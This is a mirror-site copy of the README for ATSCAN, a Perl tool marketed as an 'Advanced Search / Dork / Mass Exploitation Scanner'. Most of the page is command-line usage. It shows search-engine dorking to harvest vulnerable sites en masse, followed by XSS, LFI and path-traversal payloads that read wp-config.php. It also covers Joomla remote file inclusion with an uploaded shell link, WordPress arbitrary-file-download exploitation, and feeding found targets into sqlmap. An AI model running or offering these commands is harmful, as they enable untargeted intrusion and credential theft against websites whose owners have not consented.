Giter Club home page Giter Club logo

atscan's Introduction

ATSCAN

Advanced Search / Dork / Mass Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent!
Tool: ATSCAN version 10.3
Codename:Anon4t
AUTHOR:Ali MEHDIOUI
GROUP:Alisam Technology
FACE:facebook.com/Forces.des.tempetes.marocaines
YOUTUBE:youtube.com/c/AlisamTechnology
WITTER:twitter.com/AlisamTechno
PLUS:plus.google.com/+AlisamTechnology
Description:
Search engine Google / Bing / Ask / Yandex / Sogou
Mass Dork Search
Multiple instant scans.
Mass Exploitation
Extern commands execution.
XSS scanner.
LFI / AFD scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.
Ports scan.
Extract IPs
Extract E-mails.
Use proxy.
Random user agent.
Random proxy.
Auto detect errors.
Auto detect Cms.
And more...
Libreries to install:
Perl Requiered.
Works in all platforms.
Download:
git clone https://github.com/AlisamTechnology/ATSCAN
OR direct link: https://github.com/AlisamTechnology/ATSCAN
Permissions:
cd ATSCAN
chmod +x ATSCAN
Installation on Kali Linux:
chmod +x ./install.sh
./install.sh
Execution:
Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Uninstall Tool:
atscan --uninstall
Screenshots:




Help:
--help | -h | -? Help.
--proxy Set tor proxy [Ex: socks://localhost:9050].
Set proxy [Ex: http://12.231.54.87:8080 | list.txt].
--random Renew identity foreach link scanned.
--dork/-d dork to search [Ex: house,cars,hotel]
--level/-l Scan level (+- Number of search engine results)
-m Set engine motor [Bing = 1][Google = 2][Ask = 3][Yandex = 4][Sogou = 5][All = all]
--save/-s Save scan results.
-t Target [http://site.com]
-p Set test parameter EX:id,cat,product_ID
--time Set browser time out. default 10s.
--host Domaine name Ex: site.com
--exp Set exploit/payload
--valid/-v Text to validate results
--unique Get urls with exact dork matching
--ifinurl Text to validate target url
--isup check http status 200
--noquery Remove Query string from url. [url like: site.com/index.php?id=]
--replace string to replace
--full replace all from string to replace TO the url end
--with string to replace with
--xss Xss scan
--lfi local file inclusion
--wp get wordpress sites
--joom Get joomla sites
--joomrfi joomla local file inclusion scan
--shell shell link [Ex: http://www.site.com/shell.txt]
--wpafd get wordpress sites with arbitery file download
--admin get site admin page
--shost get site subdomains
--port port
--udp UDP port
--tcp TCP port
--sites sites in the server
--upload get sites with upload files
--zip get sites with zip files
--md5 convert to md5
--encode64 encode base64 string
--decode64 decode base64 string
--email Extract e-mails
--ip Extract IPs.
--regex Crawl to get strings matching regex
--sregex Get only urls with matching regex
rang(x-y) EX: --exp /index.php?id=rang(1-2) --xss will try id=1 then id=2
repeat(string-y) EX: --exp /index.php?id=repeat(../-3)wp-config.php
OR -t site.com/index.php?id=repeat(../-3)wp-config.php
means ../ will be repeated progressively 3 times:
will try id=../wp-config.php then id=../../wp-config.php then id=../../../wp-config.php.
--command External Command
--TARGET Will be replaced by target in extern commands
--HOST Will be replaced by hostname in extern commands
--nobanner Hide tool banner
--noinfo Jump extra results info.
--options Show scan configuration.
--beep Produce beep sound if positive scan found
--ifend Produce beep sound when scan process is finished.
--pause Pause scan when first result found.
--update Update.
--uninstall Uninstall Tool.
Examples:
Proxy:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] [Ex: http://12.32.1.5:8080] or --proxy [list.txt] [Ex: --proxy /root/Desktop/Documents/my_proxies.txt]
Random --proxy [proxy] --random
Simple search:
Search: atscan --dork [dork] --level [level] OR atscan -d [dork] -l [level]
atscan -d [dork] -l [level] --exp "/index.php?id=rang(1-9)" --xss
Set engines + search: atscan --dork [dork] --level [level] -m 1,2,.. [Engines: Bing: 1 Google: 2 Ask: 3 Yandex: 4 Sogou: 5 All engines: all]
Set selective engines: atscan --dork [dork] --level [level] -m 1,2,3..
Search with many dorks: atscan --dork [dork1,dork2,dork3] --level [level]
Get Server sites: atscan -t [ip] --level [value] --sites
Get Server wordpress sites: atscan -t [ip] --level [value] --wp
Get Server joomla sites: atscan -t [ip] --level [value] --joom
Get Server upload sites: atscan -t [ip] --level [value] --upload
Get Server zip sites files: atscan -t [ip] --level [value] --zip
WP Arbitry File Download: atscan -t [ip] --level [value] --wpafd
Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell [shell link]
Search + set save file: atscan --dork [dorks.txt] --level [level] --save
Replace + Exploit: atscan --dork [dorks.txt] --level [level] --replace [string] --with [string] --valid [string]
Search + get emails: atscan --dork [dorks.txt] --level [level] --email
Search + get site emails: atscan --dork [site:site.com] --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ip
Search by url regex: atscan --dork [dork] --level [level] --sregex [regex]
Regular Expressions Scan:
Regex use: atscan [--dork dork | -t target] --level [level] --regex [regex]
EX: To get ips from an url content ((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3}))
EX: To get mails ((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6}).
Exploitation from Serach Engine:
Exploitation: atscan --dork [dork] --level [10] [--xss | --lfi | --wp |...]
Server Exploitation: atscan -t [ip] --level [10] [--xss | --lfi | --wp |...]
Replace + Exploit: atscan --dork [dork] --level [10] --replace [string] --with [string] --exp [exploit] [--valid [string] --xss..]
atscan --dork [dork] --level [10] --exp "index.php?id=rang(1-10)" --valid [string]
atscan --dork [dork] --level [10] --exp "index.php?id=repeat(..%2F-10)wp-config.php" --valid [string]
Validation:
Search + Url Validation: atscan --dork [dork] --level [10] --ifinurl [string]
Search + dork Validation: atscan --dork [dork] --level [10] --unique
Search + Exploit + Validation: atscan --dork [dork] --level [10] --exp [--isup | --valid] [string]
Search + Server Exploit + Validation: atscan -t [ip] --level [10] --exp [--isup | --valid] [string]
Replace + exploit or validate urls: atscan --dork [dork] --level [10] --replace [string] --with [string] [--isup | --valid [string]
Use List / Target:
atscan -t [target | targets.txt] --exp [--isup | --valid] [string]
atscan -t [target | targets.txt] [--xss | --lfi | --wp |...] atscan -t "http://site.com/index.php?id=rang(1-9)" --xss
Server Ports:
Scan a server ports for open and close udp or tcp ports: atscan -t [Ex: 12.21.22.133] --ports [--udp | --tcp] --port [8080]
atscan -t (ip start)-(ip end) --port [port] [--udp | --tcp]
atscan -t [ip] --port [port start]-[port end] [--udp | --tcp] --command [your extern command for each open port found]
Encode / Decode:
Generate MD5: atscan --md5 [string]
Encode base64: atscan --encode64 [string]
Decode base64: atscan --decode64 [string]
External Command:
atscan --dork [dork | dorks.txt] --level [level] --exp [payload] --valid [string] --command "sqlmap -u --TARGET --dbs"
atscan -t [target | targets.txt] --command "curl -v --TARGET"
atscan -t [target | targets.txt] --command "curl -v --HOST"
Wordpress AFD dl-skin.php Exploit:
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --replace "scripts" --with "scripts/dl-skin.php" --full --ifinurl "lib/scripts --command "php exploit.php --TARGET"
Multiple Scans:
atscan --dork [dork] --level [level] --xss --lfi --wp ..
atscan -d [dork] -l [level] --replace [string] --with [string] --exp [exploit] [--xss | --lfi | --wp | --admin | --shost | ...]
atscan -t [ip] --level [10] [--xss | --lfi | --wp |...]
atscan -t [targets] [--xss | --lfi | --wp |...]
Check Tool and Update:
atscan --update

atscan's People

Contributors

alisamtechnology avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.